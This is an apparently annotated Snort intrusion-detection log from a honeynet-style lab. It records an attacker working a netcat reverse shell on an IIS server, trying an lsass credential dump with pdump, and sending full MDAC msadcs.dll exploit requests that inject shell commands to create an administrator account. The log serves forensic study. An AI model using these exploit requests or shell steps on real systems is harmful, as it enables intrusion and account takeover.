***AP*** Seq: 0x2CBF1955 Ack: 0x9E43FF23 Win: 0x1E2E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files....12/0
7/00 03:11p ...12/07/00 03:11p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:05.160357 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:13180 IpLen:20 DgmLen:410 DF
***AP*** Seq: 0x2CBF1A1D Ack: 0x9E43FF23 Win: 0x1E2E TcpLen: 20
....12/07/00 03:23p Microsoft Shared
..12/07/00 03:35p ODBC..12/07/00 03:23p
Services..12/07/00 03:23p
System.. 6 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program F
iles\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:11.787813 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:16508 IpLen:20 DgmLen:197 DF
***AP*** Seq: 0x2CBF1B8F Ack: 0x9E43FF3C Win: 0x1E15 TcpLen: 20
cd microsoft shadr..red..The filename, directory name, or volume
label syntax is incorrect.....C:\Program Files\Common Files>..C
:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:18.397385 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:19836 IpLen:20 DgmLen:159 DF
***AP*** Seq: 0x2CBF1C2C Ack: 0x9E43FF51 Win: 0x1E00 TcpLen: 20
cd microsoft shared....C:\Program Files\Common Files\Microsoft S
hared>..C:\Program Files\Common Files\Microsoft Shared>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:19.999886 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:20348 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1CA3 Ack: 0x9E43FF56 Win: 0x1DFB TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\Microso
ft Shared....12/07/00 03:23p ...12/07/00
03:23p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:20.492623 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:20604 IpLen:20 DgmLen:363 DF
***AP*** Seq: 0x2CBF1D6B Ack: 0x9E43FF56 Win: 0x1DFB TcpLen: 20
....12/07/00 03:23p
Stationery..12/07/00 03:09p TextConv..
4 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program Files\Common Files
\Microsoft Shared>..C:\Program Files\Common Files\Microsoft Shar
ed>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:22.603433 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:21628 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x2CBF1EAE Ack: 0x9E43FF5D Win: 0x1DF4 TcpLen: 20
cd ......C:\Program Files\Common Files>..C:\Program Files\Common
Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:25.107136 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:22908 IpLen:20 DgmLen:123 DF
***AP*** Seq: 0x2CBF1EF5 Ack: 0x9E43FF66 Win: 0x1DEB TcpLen: 20
cd odbc....C:\Program Files\Common Files\ODBC>..C:\Program Files
\Common Files\ODBC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:25.908570 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23420 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF1F48 Ack: 0x9E43FF6B Win: 0x1DE6 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\ODBC...
.12/07/00 03:35p ...12/07/00 03:35p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:26.391538 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:23676 IpLen:20 DgmLen:280 DF
***AP*** Seq: 0x2CBF2010 Ack: 0x9E43FF6B Win: 0x1DE6 TcpLen: 20
....12/07/00 03:35p Data Source
s.. 3 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program Files\Common
Files\ODBC>..C:\Program Files\Common Files\ODBC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:30.414996 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25468 IpLen:20 DgmLen:171 DF
***AP*** Seq: 0x2CBF2100 Ack: 0x9E43FF78 Win: 0x1DD9 TcpLen: 20
cd data dou..The system cannot find the path specified.....C:\Pr
ogram Files\Common Files\ODBC>..C:\Program Files\Common Files\OD
BC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:33.819933 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:27260 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x2CBF2183 Ack: 0x9E43FF89 Win: 0x1DC8 TcpLen: 20
cd data sources....C:\Program Files\Common Files\ODBC\Data Sourc
es>..C:\Program Files\Common Files\ODBC\Data Sources>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:34.721659 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28028 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF21F8 Ack: 0x9E43FF8E Win: 0x1DC3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\ODBC\Da
ta Sources....12/07/00 03:35p ...12/07/00
03:35p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Explores some more... Navigates to C:\Program Files\Common Files\ODBC\Data Sources and lists files but there is nothing interesting there.
[**] netcat session 6969 [**]
02/04-05:57:35.562852 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:28540 IpLen:20 DgmLen:466 DF
***AP*** Seq: 0x2CBF21F8 Ack: 0x9E43FF8E Win: 0x1DC3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\ODBC\Da
ta Sources....12/07/00 03:35p ...12/07/00
03:35p .... 2 File(s)
0 bytes.. 1,690,852,864 bytes
free....C:\Program Files\Common Files\ODBC\Data Sources>..C:\Pro
gram Files\Common Files\ODBC\Data Sources>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:38.026075 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29308 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x2CBF23A2 Ack: 0x9E43FF94 Win: 0x1DBD TcpLen: 20
cd......C:\Program Files\Common Files\ODBC>..C:\Program Files\Co
mmon Files\ODBC>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:49.743294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:30588 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x2CBF23F2 Ack: 0x9E43FF9E Win: 0x1DB3 TcpLen: 20
cd ......C:\Program Files\Common Files>..C:\Program Files\Common
Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:50.144062 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:30844 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF2439 Ack: 0x9E43FFA0 Win: 0x1DB1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files....12/0
7/00 03:11p ...12/07/00 03:11p
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:50.641450 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31100 IpLen:20 DgmLen:410 DF
***AP*** Seq: 0x2CBF2501 Ack: 0x9E43FFA0 Win: 0x1DB1 TcpLen: 20
....12/07/00 03:23p Microsoft Shared
..12/07/00 03:35p ODBC..12/07/00 03:23p
Services..12/07/00 03:23p
System.. 6 File(s) 0 bytes..
1,690,852,864 bytes free....C:\Program F
iles\Common Files>..C:\Program Files\Common Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:52.847781 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32124 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x2CBF2673 Ack: 0x9E43FFAD Win: 0x1DA4 TcpLen: 20
cd system....C:\Program Files\Common Files\System>..C:\Program F
iles\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:53.206700 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32380 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF26CC Ack: 0x9E43FFB0 Win: 0x1DA1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System.
...12/07/00 03:23p ...12/07/00 03:23p
213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:32636 IpLen:20 DgmLen:420 DF
***AP*** Seq: 0x2CBF2794 Ack: 0x9E43FFB0 Win: 0x1DA1 TcpLen: 20
R> ....12/07/00 03:34p ado..02/0
4/01 06:43a msadc..12/07/00 03:34p
ole db..11/11/97 12:50p 399,120
wab32.dll.. 6 File(s) 399,120 bytes..
1,690,852,864 bytes free....C:\Program Files
\Common Files\System>..C:\Program Files\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:55.852276 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33916 IpLen:20 DgmLen:172 DF
***AP*** Seq: 0x2CBF2910 Ack: 0x9E43FFBA Win: 0x1D97 TcpLen: 20
cd msads..The system cannot find the path specified.....C:\Progr
am Files\Common Files\System>..C:\Program Files\Common Files\Sys
tem>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:57:56.753913 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34428 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF2994 Ack: 0x9E43FFBF Win: 0x1D92 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System.
...12/07/00 03:23p ...12/07/00 03:23p
213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34684 IpLen:20 DgmLen:420 DF
***AP*** Seq: 0x2CBF2A5C Ack: 0x9E43FFBF Win: 0x1D92 TcpLen: 20
R> ....12/07/00 03:34p ado..02/0
4/01 06:43a msadc..12/07/00 03:34p
ole db..11/11/97 12:50p 399,120
wab32.dll.. 6 File(s) 399,120 bytes..
1,690,852,864 bytes free....C:\Program Files
\Common Files\System>..C:\Program Files\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:00.158631 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:36476 IpLen:20 DgmLen:199 DF
***AP*** Seq: 0x2CBF2BD8 Ack: 0x9E43FFCC Win: 0x1D85 TcpLen: 20
cd msas.dcs..The filename, directory name, or volume label synta
x is incorrect.....C:\Program Files\Common Files\System>..C:\Pro
gram Files\Common Files\System>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:02.562069 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37756 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x2CBF2C77 Ack: 0x9E43FFD8 Win: 0x1D79 TcpLen: 20
cd msadc....C:\Program Files\Common Files\System\msadc>..C:\Prog
ram Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# navigates remote shell to C:\Program Files\Common Files\System\msadc directory and lists files.
[**] netcat session 6969 [**]
02/04-05:58:02.912752 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38268 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBF2CDB Ack: 0x9E43FFDB Win: 0x1D76 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\System\
msadc....02/04/01 06:43a ...02/04/01 06:
43a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:03.438577 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38524 IpLen:20 DgmLen:912 DF
***AP*** Seq: 0x2CBF2DA3 Ack: 0x9E43FFDB Win: 0x1D76 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..09/25/97 08:28a
172,816 msadce.dll..09/25/97 08:16a
5,632 msadcer.dll..09/25/97 08:24a 23,312 msa
dcf.dll..09/25/97 08:24a 91,408 msadco.dll..09/2
5/97 08:19a 5,120 msadcor.dll..09/26/97 08:19a
42,256 msadcs.dll..02/04/01 06:41a
59,392 nc.exe..02/04/01 06:41a 32,768 pdump.e
xe..10/02/97 07:28a 19,388 readme.txt..02/04/01
06:41a 36,864 samdump.dll.. 15 File
(s) 698,285 bytes.. 1,690,852,86
4 bytes free....C:\Program Files\Common Files\System\msadc>..C:\
Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:06.720069 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39292 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBF310B Ack: 0x9E43FFE0 Win: 0x1D71 TcpLen: 20
psu..The name specified is not recognized as an..internal or ext
ernal command, operable program or batch file.....C:\Program Fil
es\Common Files\System\msadc>..C:\Program Files\Common Files\Sys
tem\msadc
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:07.265712 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:39548 IpLen:20 DgmLen:41 DF
***AP*** Seq: 0x2CBF31D4 Ack: 0x9E43FFE0 Win: 0x1D71 TcpLen: 20
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:08.972120 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40572 IpLen:20 DgmLen:47 DF
***AP*** Seq: 0x2CBF31D5 Ack: 0x9E43FFE7 Win: 0x1D6A TcpLen: 20
pdump..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run pdump from remote shell but this fails due to access limitations.
!@# This is not a priviledged shell
[**] netcat session 6969 [**]
02/04-05:58:09.463709 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40828 IpLen:20 DgmLen:166 DF
***AP*** Seq: 0x2CBF31DC Ack: 0x9E43FFE7 Win: 0x1D6A TcpLen: 20
Failed to open lsass: 5. Exiting.....C:\Program Files\Common Fi
les\System\msadc>..C:\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:58:33.807880 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43132 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF325A Ack: 0x9E43FFF2 Win: 0x1D5F TcpLen: 20
net start..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to list out running services with 'net start' command
[**] netcat session 6969 [**]
02/04-05:58:34.294693 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:43388 IpLen:20 DgmLen:635 DF
***AP*** Seq: 0x2CBF3265 Ack: 0x9E43FFF2 Win: 0x1D5F TcpLen: 20
These Windows NT services are started:..... Alerter.. Comput
er Browser.. EventLog.. FTP Publishing Service.. IIS Admin
Service.. License Logging Service.. Messenger.. MSDTC..
Net Logon.. NT LM Security Support Provider.. Plug and Play
.. Protected Storage.. Remote Procedure Call (RPC) Locator..
Remote Procedure Call (RPC) Service.. Server.. Spooler..
TCP/IP NetBIOS Helper.. Workstation.. World Wide Web Publi
shing Service....The command completed successfully........C:\Pr
ogram Files\Common Files\System\msadc>..C:\Program Files\Common
Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to add an account named 'testuser' to the system with a password of 'UgotHacked'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:59:02.703557 213.116.251.162:1956 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13196 IpLen:20 DgmLen:773 DF
***AP*** Seq: 0xACF2E27C Ack: 0x2CCD81F5 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 579..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 370..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r. .t.e.s.t.u.s.e.r. .U.g.o.t.H.a.c.k.e.d. ./.A.D.D
.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s.
.D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l
.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;
...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to add an account named 'testuser' to the administrators group
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:59:18.120717 213.116.251.162:1958 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:13208 IpLen:20 DgmLen:793 DF
***AP*** Seq: 0xAD2F216E Ack: 0x2CCDBE51 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 599..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 390..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .l.o.c.a.l.g.r.o.u.p. .A.d.m.i.n.i.s.t.r.a.t.o.r.s. .t.e.s
.t.u.s.e.r. ./.A.D.D.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o
.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:
.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c
.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] IDS311/ping-scanner-L3retriever [**]
02/04-05:59:36.446543 213.116.251.162 -> 172.16.1.106
ICMP TTL:111 TOS:0x0 ID:13214 IpLen:20 DgmLen:60
Type:8 Code:0 ID:1280 Seq:256 ECHO
abcdefghijklmnopqrstuvwabcdefghi
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] IDS311/ping-scanner-L3retriever [**]
02/04-05:59:37.614592 213.116.251.162 -> 172.16.1.106
ICMP TTL:111 TOS:0x0 ID:13215 IpLen:20 DgmLen:60
Type:8 Code:0 ID:1280 Seq:512 ECHO
abcdefghijklmnopqrstuvwabcdefghi
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] IDS311/ping-scanner-L3retriever [**]
02/04-05:59:38.937424 213.116.251.162 -> 172.16.1.106
ICMP TTL:111 TOS:0x0 ID:13216 IpLen:20 DgmLen:60
Type:8 Code:0 ID:1280 Seq:768 ECHO
abcdefghijklmnopqrstuvwabcdefghi
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Checks the users in administrators group from remote shell. User 'testuser' is not there.
[**] netcat session 6969 [**]
02/04-05:59:54.726438 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54396 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x2CBF34B8 Ack: 0x9E440011 Win: 0x1D40 TcpLen: 20
net localgroup administrators..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:59:55.197885 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54908 IpLen:20 DgmLen:465 DF
***AP*** Seq: 0x2CBF34D7 Ack: 0x9E440011 Win: 0x1D40 TcpLen: 20
Alias name administrators..Comment Members can fully
administer the computer/domain....Members.....------------------
-------------------------------------------------------------..A
dministrator Domain Admins IUSR_KENNY
..IWAM_KENNY ..The command completed suc
cessfully........C:\Program Files\Common Files\System\msadc>..C:
\Program Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:12.753036 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56444 IpLen:20 DgmLen:241 DF
***AP*** Seq: 0x2CBF3680 Ack: 0x9E440018 Win: 0x1D39 TcpLen: 20
dir....The name specified is not recognized as an..internal or e
xternal command, operable program or batch file.....C:\Program F
iles\Common Files\System\msadc>..C:\Program Files\Common Files\S
ystem\msa
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:13.222896 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56700 IpLen:20 DgmLen:43 DF
***AP*** Seq: 0x2CBF3749 Ack: 0x9E440018 Win: 0x1D39 TcpLen: 20
dc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:15.262971 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57724 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF374C Ack: 0x9E440023 Win: 0x1D2E TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Lists users and does not see user 'testuser'
[**] netcat session 6969 [**]
02/04-06:00:15.749652 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:57980 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF3757 Ack: 0x9E440023 Win: 0x1D2E TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:19.968496 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59260 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF38B8 Ack: 0x9E44002E Win: 0x1D23 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:20.446143 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59516 IpLen:20 DgmLen:393 DF
***AP*** Seq: 0x2CBF38C3 Ack: 0x9E44002E Win: 0x1D23 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\Program Files\Common Files\System\msadc>..C:\Program
Files\Common Files\System\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-06:00:24.173249 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61820 IpLen:20 DgmLen:54 DF
